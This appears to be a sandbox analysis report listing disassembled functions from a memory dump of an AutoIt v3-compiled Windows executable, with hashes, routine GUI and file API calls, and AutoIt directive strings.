                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: N@
                                                                                                                                                                                                                                                            • API String ID: 0-1509896676
                                                                                                                                                                                                                                                            • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                                                                                                                                            • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                                                                                                                                                                                            Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                                                                                                                                                            • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                                                                                                                                                                                            Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                                                                            • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                                                                                                                                                                                            Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                                                                                                            • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                                                                                                                                                                                            Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                                                                            • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                                                                                                                                                                                            Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045953B
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00459551
                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00459563
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00459581
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                                                                                                                                                                                            • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                                                                                                                                                                                            • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                                                                                                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                                                                                                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00459916
                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 0045993A
                                                                                                                                                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 004599FC
                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                                                                                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                            • API String ID: 4040870279-2373415609
                                                                                                                                                                                                                                                            • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                                                                                                                                                            • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                                                                                                                                                                                            Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                                                                                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                                                                                                                                                                            • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                                                                                                                                                                            • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 69173610-0
                                                                                                                                                                                                                                                            • Opcode ID: 584a999f89db3cdc510da71c668fa3e335966c035dbf61eb41b3a5421358662a
                                                                                                                                                                                                                                                            • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 584a999f89db3cdc510da71c668fa3e335966c035dbf61eb41b3a5421358662a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                                                                                                                                                                            Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                                                                                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                                                                                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                                                                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                            • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                            • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                                                                                                                                                            • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                                                                                                                                                                                            Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __wcsnicmp
                                                                                                                                                                                                                                                            • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                                                                                                            • API String ID: 1038674560-3360698832
